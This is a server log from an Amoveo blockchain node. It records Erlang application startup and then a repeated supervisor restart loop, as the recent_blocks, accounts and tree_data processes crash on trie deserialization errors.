2019-07-17 09:05:52.107 [debug] <0.685.0>@lager_handler_watcher:119 Lager installed handler error_logger_lager_h into error_logger
2019-07-17 09:05:52.107 [debug] <0.672.0> Supervisor gr_param_sup started gr_param:start_link(gr_lager_default_tracer_params) at pid <0.687.0>
2019-07-17 09:05:52.107 [debug] <0.671.0> Supervisor gr_counter_sup started gr_counter:start_link(gr_lager_default_tracer_counters) at pid <0.688.0>
2019-07-17 09:05:52.107 [debug] <0.673.0> Supervisor gr_manager_sup started gr_manager:start_link(gr_lager_default_tracer_params_mgr, gr_lager_default_tracer_params, []) at pid <0.689.0>
2019-07-17 09:05:52.107 [debug] <0.673.0> Supervisor gr_manager_sup started gr_manager:start_link(gr_lager_default_tracer_counters_mgr, gr_lager_default_tracer_counters, [{input,0},{filter,0},{output,0},{job_input,0},{job_run,0},{job_time,0},{job_error,0}]) at pid <0.690.0>
2019-07-17 09:05:52.117 [info] <0.586.0> Application lager started on node amoveo_core_prod@testnode
2019-07-17 09:05:52.117 [info] <0.586.0> Application crypto started on node amoveo_core_prod@testnode
2019-07-17 09:05:52.117 [info] <0.586.0> Application asn1 started on node amoveo_core_prod@testnode
2019-07-17 09:05:52.117 [info] <0.586.0> Application public_key started on node amoveo_core_prod@testnode
2019-07-17 09:05:52.118 [debug] <0.699.0> Supervisor ssl_admin_sup started ssl_pem_cache:start_link([]) at pid <0.700.0>
2019-07-17 09:05:52.118 [debug] <0.699.0> Supervisor ssl_admin_sup started ssl_manager:start_link([]) at pid <0.701.0>
2019-07-17 09:05:52.118 [debug] <0.698.0> Supervisor ssl_sup started ssl_admin_sup:start_link() at pid <0.699.0>
2019-07-17 09:05:52.118 [debug] <0.702.0> Supervisor ssl_connection_sup started tls_connection_sup:start_link() at pid <0.703.0>
2019-07-17 09:05:52.118 [debug] <0.702.0> Supervisor ssl_connection_sup started ssl_listen_tracker_sup:start_link() at pid <0.704.0>
2019-07-17 09:05:52.118 [debug] <0.702.0> Supervisor ssl_connection_sup started dtls_connection_sup:start_link() at pid <0.705.0>
2019-07-17 09:05:52.118 [debug] <0.702.0> Supervisor ssl_connection_sup started dtls_udp_sup:start_link() at pid <0.706.0>
2019-07-17 09:05:52.118 [debug] <0.698.0> Supervisor ssl_sup started ssl_connection_sup:start_link() at pid <0.702.0>
2019-07-17 09:05:52.118 [info] <0.586.0> Application ssl started on node amoveo_core_prod@testnode
2019-07-17 09:05:52.118 [debug] <0.710.0> Supervisor ranch_sup started ranch_server:start_link() at pid <0.711.0>
2019-07-17 09:05:52.118 [info] <0.586.0> Application ranch started on node amoveo_core_prod@testnode
2019-07-17 09:05:52.119 [info] <0.586.0> Application cowlib started on node amoveo_core_prod@testnode
2019-07-17 09:05:52.119 [debug] <0.716.0> Supervisor cowboy_sup started cowboy_clock:start_link() at pid <0.717.0>
2019-07-17 09:05:52.119 [info] <0.586.0> Application cowboy started on node amoveo_core_prod@testnode
2019-07-17 09:05:52.119 [debug] <0.722.0> Supervisor {<0.722.0>,ranch_listener_sup} started ranch_conns_sup:start_link(http_internal, worker, 5000, ranch_tcp, 5000, cowboy_protocol) at pid <0.723.0>
2019-07-17 09:05:52.120 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.725.0>
2019-07-17 09:05:52.120 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.726.0>
2019-07-17 09:05:52.120 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.727.0>
2019-07-17 09:05:52.120 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.728.0>
2019-07-17 09:05:52.120 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.729.0>
2019-07-17 09:05:52.120 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.730.0>
2019-07-17 09:05:52.120 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.731.0>
2019-07-17 09:05:52.120 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.732.0>
2019-07-17 09:05:52.120 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.733.0>
2019-07-17 09:05:52.121 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.734.0>
2019-07-17 09:05:52.121 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.735.0>
2019-07-17 09:05:52.121 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.736.0>
2019-07-17 09:05:52.121 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.737.0>
2019-07-17 09:05:52.121 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.738.0>
2019-07-17 09:05:52.121 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.739.0>
2019-07-17 09:05:52.121 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.740.0>
2019-07-17 09:05:52.121 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.741.0>
2019-07-17 09:05:52.121 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.742.0>
2019-07-17 09:05:52.121 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.743.0>
2019-07-17 09:05:52.121 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.744.0>
2019-07-17 09:05:52.121 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.745.0>
2019-07-17 09:05:52.121 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.746.0>
2019-07-17 09:05:52.121 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.747.0>
2019-07-17 09:05:52.122 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.748.0>
2019-07-17 09:05:52.122 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.749.0>
2019-07-17 09:05:52.122 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.750.0>
2019-07-17 09:05:52.122 [debug] <0.724.0> Supervisor {<0.724.0>,ranch_acceptors_sup} started ranch_acceptor:start_link(#Port<0.1253>, ranch_tcp, <0.723.0>) at pid <0.751.0>
2019-07-17 09:05:52.607 [debug] <0.681.0>@lager_handler_watcher:119 Lager installed handler lager_backend_throttle into lager_event
2019-07-17 09:05:53.014 [warning] <0.585.0> lager_error_logger_h dropped 176 messages in the last second that exceeded the limit of 50 messages/sec
2019-07-17 09:05:53.717 [debug] <0.1101.0> Supervisor inet_gethost_native_sup started undefined at pid <0.1102.0>
2019-07-17 09:05:53.717 [debug] <0.615.0> Supervisor kernel_safe_sup started inet_gethost_native:start_link() at pid <0.1101.0>
2019-07-17 09:15:34.789 [error] <0.1036.0>@block:prev_hash:190 gen_server recent_blocks terminated with reason: bad argument in block:prev_hash/2 line 190
2019-07-17 09:15:34.789 [error] <0.1036.0>@block:prev_hash:190 CRASH REPORT Process recent_blocks with 0 neighbours crashed with reason: bad argument in block:prev_hash/2 line 190
2019-07-17 09:15:34.790 [error] <0.940.0>@block:prev_hash:190 Supervisor amoveo_sup had child recent_blocks started with recent_blocks:start_link() at <0.1036.0> exit with reason bad argument in block:prev_hash/2 line 190 in context child_terminated
2019-07-17 09:15:34.790 [debug] <0.940.0> Supervisor amoveo_sup started recent_blocks:start_link() at pid <0.28677.1>
2019-07-17 09:15:34.894 [error] <0.952.0>@stem:deserialize:129 gen_server accounts_main terminated with reason: no match of right hand value empty in stem:deserialize/7 line 129
2019-07-17 09:15:34.894 [error] <0.952.0>@stem:deserialize:129 CRASH REPORT Process <0.952.0> with 0 neighbours crashed with reason: no match of right hand value empty in stem:deserialize/7 line 129
2019-07-17 09:15:34.894 [error] <0.941.0>@stem:deserialize:129 Supervisor {global,accounts} had child accounts_main started with trie:start_link({cfg,32,106,accounts,3,32,ram,undefined}) at <0.952.0> exit with reason no match of right hand value empty in stem:deserialize/7 line 129 in context child_terminated
2019-07-17 09:15:34.897 [error] <0.1060.0> gen_server tree_data terminated with reason: {{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}} in gen_server:call/2 line 206
2019-07-17 09:15:34.897 [error] <0.1060.0> CRASH REPORT Process tree_data with 0 neighbours exited with reason: {{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}} in gen_server:call/2 line 206
2019-07-17 09:15:34.898 [error] <0.940.0> Supervisor amoveo_sup had child tree_data started with tree_data:start_link() at <0.1060.0> exit with reason {{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}} in context child_terminated
2019-07-17 09:15:34.898 [debug] <0.940.0> Supervisor amoveo_sup started tree_data:start_link() at pid <0.28685.1>
2019-07-17 09:15:34.900 [error] <0.28677.1> gen_server recent_blocks terminated with reason: {{{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}},...} in gen_server:call/2 line 206
2019-07-17 09:15:34.901 [error] <0.28677.1> CRASH REPORT Process recent_blocks with 0 neighbours exited with reason: {{{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}},...} in gen_server:call/2 line 206
2019-07-17 09:15:34.902 [error] <0.940.0> Supervisor amoveo_sup had child recent_blocks started with recent_blocks:start_link() at <0.28677.1> exit with reason {{{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}},...} in context child_terminated
2019-07-17 09:15:34.902 [debug] <0.941.0> Supervisor {global,accounts} started trie:start_link({cfg,32,106,accounts,3,32,ram,undefined}) at pid <0.28684.1>
2019-07-17 09:15:34.902 [debug] <0.940.0> Supervisor amoveo_sup started recent_blocks:start_link() at pid <0.28686.1>
2019-07-17 09:15:35.033 [error] <0.28684.1>@stem:deserialize:129 gen_server accounts_main terminated with reason: no match of right hand value empty in stem:deserialize/7 line 129
2019-07-17 09:15:35.033 [error] <0.28684.1>@stem:deserialize:129 CRASH REPORT Process <0.28684.1> with 0 neighbours crashed with reason: no match of right hand value empty in stem:deserialize/7 line 129
2019-07-17 09:15:35.034 [error] <0.941.0>@stem:deserialize:129 Supervisor {global,accounts} had child accounts_main started with trie:start_link({cfg,32,106,accounts,3,32,ram,undefined}) at <0.28684.1> exit with reason no match of right hand value empty in stem:deserialize/7 line 129 in context child_terminated
2019-07-17 09:15:35.035 [error] <0.28685.1> gen_server tree_data terminated with reason: {{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}} in gen_server:call/2 line 206
2019-07-17 09:15:35.036 [error] <0.28685.1> CRASH REPORT Process tree_data with 0 neighbours exited with reason: {{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}} in gen_server:call/2 line 206
2019-07-17 09:15:35.036 [error] <0.940.0> Supervisor amoveo_sup had child tree_data started with tree_data:start_link() at <0.28685.1> exit with reason {{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}} in context child_terminated
2019-07-17 09:15:35.036 [debug] <0.940.0> Supervisor amoveo_sup started tree_data:start_link() at pid <0.28692.1>
2019-07-17 09:15:35.039 [error] <0.28686.1> gen_server recent_blocks terminated with reason: {{{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}},...} in gen_server:call/2 line 206
2019-07-17 09:15:35.039 [error] <0.28686.1> CRASH REPORT Process recent_blocks with 0 neighbours exited with reason: {{{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}},...} in gen_server:call/2 line 206
2019-07-17 09:15:35.040 [error] <0.940.0> Supervisor amoveo_sup had child recent_blocks started with recent_blocks:start_link() at <0.28686.1> exit with reason {{{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}},...} in context child_terminated
2019-07-17 09:15:35.040 [debug] <0.941.0> Supervisor {global,accounts} started trie:start_link({cfg,32,106,accounts,3,32,ram,undefined}) at pid <0.28691.1>
2019-07-17 09:15:35.040 [debug] <0.940.0> Supervisor amoveo_sup started recent_blocks:start_link() at pid <0.28693.1>
2019-07-17 09:15:35.176 [error] <0.28691.1>@stem:deserialize:129 gen_server accounts_main terminated with reason: no match of right hand value empty in stem:deserialize/7 line 129
2019-07-17 09:15:35.176 [error] <0.28691.1>@stem:deserialize:129 CRASH REPORT Process <0.28691.1> with 0 neighbours crashed with reason: no match of right hand value empty in stem:deserialize/7 line 129
2019-07-17 09:15:35.177 [error] <0.941.0>@stem:deserialize:129 Supervisor {global,accounts} had child accounts_main started with trie:start_link({cfg,32,106,accounts,3,32,ram,undefined}) at <0.28691.1> exit with reason no match of right hand value empty in stem:deserialize/7 line 129 in context child_terminated
2019-07-17 09:15:35.178 [error] <0.28692.1> gen_server tree_data terminated with reason: {{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}} in gen_server:call/2 line 206
2019-07-17 09:15:35.178 [error] <0.28692.1> CRASH REPORT Process tree_data with 0 neighbours exited with reason: {{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}} in gen_server:call/2 line 206
2019-07-17 09:15:35.179 [error] <0.940.0> Supervisor amoveo_sup had child tree_data started with tree_data:start_link() at <0.28692.1> exit with reason {{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}} in context child_terminated
2019-07-17 09:15:35.179 [debug] <0.940.0> Supervisor amoveo_sup started tree_data:start_link() at pid <0.28701.1>
2019-07-17 09:15:35.182 [error] <0.28693.1> gen_server recent_blocks terminated with reason: {{{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}},...} in gen_server:call/2 line 206
2019-07-17 09:15:35.183 [error] <0.28693.1> CRASH REPORT Process recent_blocks with 0 neighbours exited with reason: {{{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}},...} in gen_server:call/2 line 206
2019-07-17 09:15:35.183 [error] <0.940.0> Supervisor amoveo_sup had child recent_blocks started with recent_blocks:start_link() at <0.28693.1> exit with reason {{{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}},...} in context child_terminated
2019-07-17 09:15:35.183 [debug] <0.941.0> Supervisor {global,accounts} started trie:start_link({cfg,32,106,accounts,3,32,ram,undefined}) at pid <0.28700.1>
2019-07-17 09:15:35.183 [debug] <0.940.0> Supervisor amoveo_sup started recent_blocks:start_link() at pid <0.28702.1>
2019-07-17 09:15:35.335 [error] <0.28700.1>@stem:deserialize:129 gen_server accounts_main terminated with reason: no match of right hand value empty in stem:deserialize/7 line 129
2019-07-17 09:15:35.335 [error] <0.28700.1>@stem:deserialize:129 CRASH REPORT Process <0.28700.1> with 0 neighbours crashed with reason: no match of right hand value empty in stem:deserialize/7 line 129
2019-07-17 09:15:35.335 [error] <0.941.0>@stem:deserialize:129 Supervisor {global,accounts} had child accounts_main started with trie:start_link({cfg,32,106,accounts,3,32,ram,undefined}) at <0.28700.1> exit with reason no match of right hand value empty in stem:deserialize/7 line 129 in context child_terminated
2019-07-17 09:15:35.337 [error] <0.28701.1> gen_server tree_data terminated with reason: {{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}} in gen_server:call/2 line 206
2019-07-17 09:15:35.337 [error] <0.28701.1> CRASH REPORT Process tree_data with 0 neighbours exited with reason: {{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}} in gen_server:call/2 line 206
2019-07-17 09:15:35.337 [error] <0.940.0> Supervisor amoveo_sup had child tree_data started with tree_data:start_link() at <0.28701.1> exit with reason {{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}} in context child_terminated
2019-07-17 09:15:35.337 [debug] <0.940.0> Supervisor amoveo_sup started tree_data:start_link() at pid <0.28710.1>
2019-07-17 09:15:35.340 [error] <0.28702.1> gen_server recent_blocks terminated with reason: {{{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}},...} in gen_server:call/2 line 206
2019-07-17 09:15:35.340 [error] <0.28702.1> CRASH REPORT Process recent_blocks with 0 neighbours exited with reason: {{{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}},...} in gen_server:call/2 line 206
